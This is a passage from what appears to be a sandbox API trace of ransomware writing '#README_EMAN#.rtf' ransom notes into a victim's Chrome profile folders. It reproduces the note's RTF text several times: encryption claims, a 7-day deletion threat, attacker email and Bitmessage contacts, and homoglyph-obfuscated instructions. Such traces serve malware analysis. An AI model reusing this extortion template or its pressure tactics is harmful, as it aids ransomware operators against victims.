!!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.500] WriteFile (in: hFile=0x228, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.500] CloseHandle (hObject=0x228) returned 1 [0298.500] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#readme_eman#.rtf")) returned 0x20 [0298.501] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\#readme_eman#.rtf")) returned 0x20 [0298.501] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#readme_eman#.rtf")) returned 0x20 [0298.501] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\#readme_eman#.rtf")) returned 0xffffffff [0298.501] GetLastError () returned 0x2 [0298.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0298.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 